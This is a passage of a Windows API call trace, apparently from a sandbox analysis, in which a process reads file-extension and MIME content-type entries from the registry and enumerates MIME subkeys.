lpcbData=0x19fc14*=0x18) returned 0x0 [0103.926] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24a55ac, lpcbData=0x19fc20*=0x18 | out: lpType=0x19fc10*=0x1, lpData="video/x-flv", lpcbData=0x19fc20*=0x18) returned 0x0 [0103.927] CharLowerBuffW (in: lpsz="video/x-flv", cchLength=0xb | out: lpsz="video/x-flv") returned 0xb [0103.927] CharLowerBuffW (in: lpsz=".flv", cchLength=0x4 | out: lpsz=".flv") returned 0x4 [0103.927] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.927] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fnd", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.927] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".fnd", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.927] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.927] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.927] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fnt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.927] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".fnt", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.927] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.927] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.927] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".fon", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.927] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".fon", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.927] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.927] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gcsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.928] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".gcsx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.928] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.928] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ghi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.928] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".ghi", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.928] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.928] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.928] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.928] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".gif", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.928] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x14) returned 0x0 [0103.928] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x249ae7c, lpcbData=0x19fc20*=0x14 | out: lpType=0x19fc10*=0x1, lpData="image/gif", lpcbData=0x19fc20*=0x14) returned 0x0 [0103.928] CharLowerBuffW (in: lpsz="image/gif", cchLength=0x9 | out: lpsz="image/gif") returned 0x9 [0103.928] CharLowerBuffW (in: lpsz=".gif", cchLength=0x4 | out: lpsz=".gif") returned 0x4 [0103.929] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".glox", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.929] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".glox", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.929] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.929] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gmmp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.929] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".gmmp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.929] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.929] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.929] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gqsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.929] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".gqsx", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.929] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.929] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gra", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.930] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".gra", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.930] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.930] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".group", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.930] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".group", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.930] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x20) returned 0x0 [0103.930] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fc10, lpData=0x24dc14c, lpcbData=0x19fc20*=0x20 | out: lpType=0x19fc10*=0x1, lpData="text/x-ms-group", lpcbData=0x19fc20*=0x20) returned 0x0 [0103.930] CharLowerBuffW (in: lpsz="text/x-ms-group", cchLength=0xf | out: lpsz="text/x-ms-group") returned 0xf [0103.930] CharLowerBuffW (in: lpsz=".group", cchLength=0x6 | out: lpsz=".group") returned 0x6 [0103.930] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".grp", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.930] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".grp", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.930] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x0, lpData=0x0, lpcbData=0x19fc14*=0x0) returned 0x2 [0103.931] RegCloseKey (hKey=0x3f2) returned 0x0 [0103.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gz", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0103.931] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".gz", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x3f2) returned 0x0 [0103.931] RegQueryValueExW (in: hKey=0x3f2, lpValueName="Content Type", lpReserved=0x0, lpType=0x19fbfc, lpData=0x0, lpcbData=0x19fc14*=0x0 | out: lpType=0x19fbfc*=0x1, lpData=0x0, lpcbData=0x19fc14*=0x26) returned 0x0 [0103.932] CharLowerBuffW (in: lpsz="application/x-gzip", cchLength=0x12 | out: lpsz="application/x-gzip") returned 0x12 [0103.932] CharLowerBuffW (in: lpsz=".gz", cchLength=0x3 | out: lpsz=".gz") returned 0x3 [0103.932] CharLowerBuffW (in: lpsz="application/mac-binhex40", cchLength=0x18 | out: lpsz="application/mac-binhex40") returned 0x18 [0103.932] CharLowerBuffW (in: lpsz=".hqx", cchLength=0x4 | out: lpsz=".hqx") returned 0x4 [0103.932] CharLowerBuffW (in: lpsz="application/hta", cchLength=0xf | out: lpsz="application/hta") returned 0xf [0103.932] CharLowerBuffW (in: lpsz=".hta", cchLength=0x4 | out: lpsz=".hta") returned 0x4 [0103.933] CharLowerBuffW (in: lpsz="text/x-component", cchLength=0x10 | out: lpsz="text/x-component") returned 0x10 [0103.933] CharLowerBuffW (in: lpsz=".htc", cchLength=0x4 | out: lpsz=".htc") returned 0x4 [0103.933] CharLowerBuffW (in: lpsz="text/html", cchLength=0x9 | out: lpsz="text/html") returned 0x9 [0103.933] CharLowerBuffW (in: lpsz=".htm", cchLength=0x4 | out: lpsz=".htm") returned 0x4 [0103.933] CharLowerBuffW (in: lpsz="text/html", cchLength=0x9 | out: lpsz="text/html") returned 0x9 [0103.933] CharLowerBuffW (in: lpsz=".html", cchLength=0x5 | out: lpsz=".html") returned 0x5 [0103.933] CharLowerBuffW (in: lpsz="application/xml", cchLength=0xf | out: lpsz="application/xml") returned 0xf [0103.933] CharLowerBuffW (in: lpsz=".hxa", cchLength=0x4 | out: lpsz=".hxa") returned 0x4 [0103.933] CharLowerBuffW (in: lpsz="application/xml", cchLength=0xf | out: lpsz="application/xml") returned 0xf [0103.933] CharLowerBuffW (in: lpsz=".hxc", cchLength=0x4 | out: lpsz=".hxc") returned 0x4 [0103.933] CharLowerBuffW (in: lpsz="application/octet-stream", cchLength=0x18 | out: lpsz="application/octet-stream") returned 0x18 [0103.933] CharLowerBuffW (in: lpsz=".hxd", cchLength=0x4 | out: lpsz=".hxd") returned 0x4 [0103.933] CharLowerBuffW (in: lpsz="application/xml", cchLength=0xf | out: lpsz="application/xml") returned 0xf [0103.933] CharLowerBuffW (in: lpsz=".hxe", cchLength=0x4 | out: lpsz=".hxe") returned 0x4 [0103.934] CharLowerBuffW (in: lpsz="application/xml", cchLength=0xf | out: lpsz="application/xml") returned 0xf [0103.934] CharLowerBuffW (in: lpsz=".hxf", cchLength=0x4 | out: lpsz=".hxf") returned 0x4 [0103.934] CharLowerBuffW (in: lpsz="application/octet-stream", cchLength=0x18 | out: lpsz="application/octet-stream") returned 0x18 [0103.934] CharLowerBuffW (in: lpsz=".hxh", cchLength=0x4 | out: lpsz=".hxh") returned 0x4 [0103.934] CharLowerBuffW (in: lpsz="application/octet-stream", cchLength=0x18 | out: lpsz="application/octet-stream") returned 0x18 [0103.934] CharLowerBuffW (in: lpsz=".hxi", cchLength=0x4 | out: lpsz=".hxi") returned 0x4 [0103.934] CharLowerBuffW (in: lpsz="application/xml", cchLength=0xf | out: lpsz="application/xml") returned 0xf [0103.934] CharLowerBuffW (in: lpsz=".hxk", cchLength=0x4 | out: lpsz=".hxk") returned 0x4 [0103.934] CharLowerBuffW (in: lpsz="application/octet-stream", cchLength=0x18 | out: lpsz="application/octet-stream") returned 0x18 [0103.934] CharLowerBuffW (in: lpsz=".hxq", cchLength=0x4 | out: lpsz=".hxq") returned 0x4 [0103.934] CharLowerBuffW (in: lpsz="application/octet-stream", cchLength=0x18 | out: lpsz="application/octet-stream") returned 0x18 [0103.934] CharLowerBuffW (in: lpsz=".hxr", cchLength=0x4 | out: lpsz=".hxr") returned 0x4 [0103.935] CharLowerBuffW (in: lpsz="application/octet-stream", cchLength=0x18 | out: lpsz="application/octet-stream") returned 0x18 [0103.935] CharLowerBuffW (in: lpsz=".hxs", cchLength=0x4 | out: lpsz=".hxs") returned 0x4 [0103.935] CharLowerBuffW (in: lpsz="application/xml", cchLength=0xf | out: lpsz="application/xml") returned 0xf [0103.935] CharLowerBuffW (in: lpsz=".hxt", cchLength=0x4 | out: lpsz=".hxt") returned 0x4 [0103.935] CharLowerBuffW (in: lpsz="application/xml", cchLength=0xf | out: lpsz="application/xml") returned 0xf [0103.935] CharLowerBuffW (in: lpsz=".hxv", cchLength=0x4 | out: lpsz=".hxv") returned 0x4 [0103.935] CharLowerBuffW (in: lpsz="application/octet-stream", cchLength=0x18 | out: lpsz="application/octet-stream") returned 0x18 [0103.935] CharLowerBuffW (in: lpsz=".hxw", cchLength=0x4 | out: lpsz=".hxw") returned 0x4 [0103.935] CharLowerBuffW (in: lpsz="image/x-icon", cchLength=0xc | out: lpsz="image/x-icon") returned 0xc [0103.935] CharLowerBuffW (in: lpsz=".ico", cchLength=0x4 | out: lpsz=".ico") returned 0x4 [0103.935] CharLowerBuffW (in: lpsz="text/calendar", cchLength=0xd | out: lpsz="text/calendar") returned 0xd [0103.935] CharLowerBuffW (in: lpsz=".ics", cchLength=0x4 | out: lpsz=".ics") returned 0x4 [0103.936] CharLowerBuffW (in: lpsz="text/x-ms-iqy", cchLength=0xd | out: lpsz="text/x-ms-iqy") returned 0xd [0103.936] CharLowerBuffW (in: lpsz=".iqy", cchLength=0x4 | out: lpsz=".iqy") returned 0x4 [0103.936] CharLowerBuffW (in: lpsz="image/jpeg", cchLength=0xa | out: lpsz="image/jpeg") returned 0xa [0103.936] CharLowerBuffW (in: lpsz=".jfif", cchLength=0x5 | out: lpsz=".jfif") returned 0x5 [0103.936] CharLowerBuffW (in: lpsz="application/x-java-jnlp-file", cchLength=0x1c | out: lpsz="application/x-java-jnlp-file") returned 0x1c [0103.936] CharLowerBuffW (in: lpsz=".jnlp", cchLength=0x5 | out: lpsz=".jnlp") returned 0x5 [0103.936] CharLowerBuffW (in: lpsz="image/jpeg", cchLength=0xa | out: lpsz="image/jpeg") returned 0xa [0103.936] CharLowerBuffW (in: lpsz=".jpe", cchLength=0x4 | out: lpsz=".jpe") returned 0x4 [0103.936] CharLowerBuffW (in: lpsz="image/jpeg", cchLength=0xa | out: lpsz="image/jpeg") returned 0xa [0103.936] CharLowerBuffW (in: lpsz=".jpeg", cchLength=0x5 | out: lpsz=".jpeg") returned 0x5 [0103.937] CharLowerBuffW (in: lpsz="image/jpeg", cchLength=0xa | out: lpsz="image/jpeg") returned 0xa [0103.937] CharLowerBuffW (in: lpsz=".jpg", cchLength=0x4 | out: lpsz=".jpg") returned 0x4 [0103.937] CharLowerBuffW (in: lpsz="application/x-jtx+xps", cchLength=0x15 | out: lpsz="application/x-jtx+xps") returned 0x15 [0103.937] CharLowerBuffW (in: lpsz=".jtx", cchLength=0x4 | out: lpsz=".jtx") returned 0x4 [0103.937] CharLowerBuffW (in: lpsz="image/vnd.ms-photo", cchLength=0x12 | out: lpsz="image/vnd.ms-photo") returned 0x12 [0103.937] CharLowerBuffW (in: lpsz=".jxr", cchLength=0x4 | out: lpsz=".jxr") returned 0x4 [0103.937] CharLowerBuffW (in: lpsz="image/KDC", cchLength=0x9 | out: lpsz="image/kdc") returned 0x9 [0103.937] CharLowerBuffW (in: lpsz=".kdc", cchLength=0x4 | out: lpsz=".kdc") returned 0x4 [0103.937] CharLowerBuffW (in: lpsz="application/x-latex", cchLength=0x13 | out: lpsz="application/x-latex") returned 0x13 [0103.937] CharLowerBuffW (in: lpsz=".latex", cchLength=0x6 | out: lpsz=".latex") returned 0x6 [0103.937] CharLowerBuffW (in: lpsz="application/windows-library+xml", cchLength=0x1f | out: lpsz="application/windows-library+xml") returned 0x1f [0103.937] CharLowerBuffW (in: lpsz=".library-ms", cchLength=0xb | out: lpsz=".library-ms") returned 0xb [0103.938] CharLowerBuffW (in: lpsz="audio/l16", cchLength=0x9 | out: lpsz="audio/l16") returned 0x9 [0103.938] CharLowerBuffW (in: lpsz=".lpcm", cchLength=0x5 | out: lpsz=".lpcm") returned 0x5 [0103.938] CharLowerBuffW (in: lpsz="video/mpeg", cchLength=0xa | out: lpsz="video/mpeg") returned 0xa [0103.938] CharLowerBuffW (in: lpsz=".m1v", cchLength=0x4 | out: lpsz=".m1v") returned 0x4 [0103.938] CharLowerBuffW (in: lpsz="video/vnd.dlna.mpeg-tts", cchLength=0x17 | out: lpsz="video/vnd.dlna.mpeg-tts") returned 0x17 [0103.938] CharLowerBuffW (in: lpsz=".m2t", cchLength=0x4 | out: lpsz=".m2t") returned 0x4 [0103.938] CharLowerBuffW (in: lpsz="video/vnd.dlna.mpeg-tts", cchLength=0x17 | out: lpsz="video/vnd.dlna.mpeg-tts") returned 0x17 [0103.938] CharLowerBuffW (in: lpsz=".m2ts", cchLength=0x5 | out: lpsz=".m2ts") returned 0x5 [0103.938] CharLowerBuffW (in: lpsz="video/mpeg", cchLength=0xa | out: lpsz="video/mpeg") returned 0xa [0103.938] CharLowerBuffW (in: lpsz=".m2v", cchLength=0x4 | out: lpsz=".m2v") returned 0x4 [0103.938] CharLowerBuffW (in: lpsz="audio/x-mpegurl", cchLength=0xf | out: lpsz="audio/x-mpegurl") returned 0xf [0103.938] CharLowerBuffW (in: lpsz=".m3u", cchLength=0x4 | out: lpsz=".m3u") returned 0x4 [0103.938] CharLowerBuffW (in: lpsz="audio/mp4", cchLength=0x9 | out: lpsz="audio/mp4") returned 0x9 [0103.938] CharLowerBuffW (in: lpsz=".m4a", cchLength=0x4 | out: lpsz=".m4a") returned 0x4 [0103.939] CharLowerBuffW (in: lpsz="video/mp4", cchLength=0x9 | out: lpsz="video/mp4") returned 0x9 [0103.939] CharLowerBuffW (in: lpsz=".m4v", cchLength=0x4 | out: lpsz=".m4v") returned 0x4 [0103.939] CharLowerBuffW (in: lpsz="application/x-troff-man", cchLength=0x17 | out: lpsz="application/x-troff-man") returned 0x17 [0103.939] CharLowerBuffW (in: lpsz=".man", cchLength=0x4 | out: lpsz=".man") returned 0x4 [0103.939] CharLowerBuffW (in: lpsz="application/msaccess", cchLength=0x14 | out: lpsz="application/msaccess") returned 0x14 [0103.939] CharLowerBuffW (in: lpsz=".mda", cchLength=0x4 | out: lpsz=".mda") returned 0x4 [0103.939] CharLowerBuffW (in: lpsz="application/msaccess", cchLength=0x14 | out: lpsz="application/msaccess") returned 0x14 [0103.939] CharLowerBuffW (in: lpsz=".mdb", cchLength=0x4 | out: lpsz=".mdb") returned 0x4 [0103.939] CharLowerBuffW (in: lpsz="application/msaccess", cchLength=0x14 | out: lpsz="application/msaccess") returned 0x14 [0103.939] CharLowerBuffW (in: lpsz=".mde", cchLength=0x4 | out: lpsz=".mde") returned 0x4 [0103.940] CharLowerBuffW (in: lpsz="message/rfc822", cchLength=0xe | out: lpsz="message/rfc822") returned 0xe [0103.940] CharLowerBuffW (in: lpsz=".mht", cchLength=0x4 | out: lpsz=".mht") returned 0x4 [0103.940] CharLowerBuffW (in: lpsz="message/rfc822", cchLength=0xe | out: lpsz="message/rfc822") returned 0xe [0103.940] CharLowerBuffW (in: lpsz=".mhtml", cchLength=0x6 | out: lpsz=".mhtml") returned 0x6 [0103.940] CharLowerBuffW (in: lpsz="audio/mid", cchLength=0x9 | out: lpsz="audio/mid") returned 0x9 [0103.940] CharLowerBuffW (in: lpsz=".mid", cchLength=0x4 | out: lpsz=".mid") returned 0x4 [0103.940] CharLowerBuffW (in: lpsz="audio/mid", cchLength=0x9 | out: lpsz="audio/mid") returned 0x9 [0103.940] CharLowerBuffW (in: lpsz=".midi", cchLength=0x5 | out: lpsz=".midi") returned 0x5 [0103.942] CharLowerBuffW (in: lpsz="audio/x-matroska", cchLength=0x10 | out: lpsz="audio/x-matroska") returned 0x10 [0103.942] CharLowerBuffW (in: lpsz=".mka", cchLength=0x4 | out: lpsz=".mka") returned 0x4 [0103.943] CharLowerBuffW (in: lpsz="video/x-matroska", cchLength=0x10 | out: lpsz="video/x-matroska") returned 0x10 [0103.943] CharLowerBuffW (in: lpsz=".mkv", cchLength=0x4 | out: lpsz=".mkv") returned 0x4 [0103.944] CharLowerBuffW (in: lpsz="video/mpeg", cchLength=0xa | out: lpsz="video/mpeg") returned 0xa [0103.944] CharLowerBuffW (in: lpsz=".mod", cchLength=0x4 | out: lpsz=".mod") returned 0x4 [0103.945] CharLowerBuffW (in: lpsz="video/quicktime", cchLength=0xf | out: lpsz="video/quicktime") returned 0xf [0103.945] CharLowerBuffW (in: lpsz=".mov", cchLength=0x4 | out: lpsz=".mov") returned 0x4 [0103.946] CharLowerBuffW (in: lpsz="audio/mpeg", cchLength=0xa | out: lpsz="audio/mpeg") returned 0xa [0103.946] CharLowerBuffW (in: lpsz=".mp2", cchLength=0x4 | out: lpsz=".mp2") returned 0x4 [0103.947] CharLowerBuffW (in: lpsz="video/mpeg", cchLength=0xa | out: lpsz="video/mpeg") returned 0xa [0104.240] RegQueryInfoKeyW (in: hKey=0x3f2, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x19fc0c, lpcbMaxSubKeyLen=0x19fc10, lpcbMaxClassLen=0x0, lpcValues=0x19fc14, lpcbMaxValueNameLen=0x19fc18, lpcbMaxValueLen=0x19fc1c, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x19fc20 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x19fc0c*=0xd9, lpcbMaxSubKeyLen=0x19fc10, lpcbMaxClassLen=0x0, lpcValues=0x19fc14*=0x0, lpcbMaxValueNameLen=0x19fc18, lpcbMaxValueLen=0x19fc1c, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x19fc20) returned 0x0 [0104.295] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x0, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/atom+xml", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.295] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x1, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/epub+zip", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.295] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x2, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/fractals", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x3, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/futuresplash", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x4, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/hta", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x5, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/java-deployment-toolkit", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x6, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/mac-binhex40", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x7, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/msaccess", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x8, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/msaccess.addin", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0x9, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/msaccess.cab", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xa, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/msaccess.exec", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xb, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/msaccess.ftemplate", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xc, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/msaccess.runtime", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xd, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/msaccess.template", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xe, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/msaccess.webapplication", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0104.296] RegEnumKeyExW (in: hKey=0x3f2, dwIndex=0xf, lpName=0x23d2ebc, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="application/msonenote", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 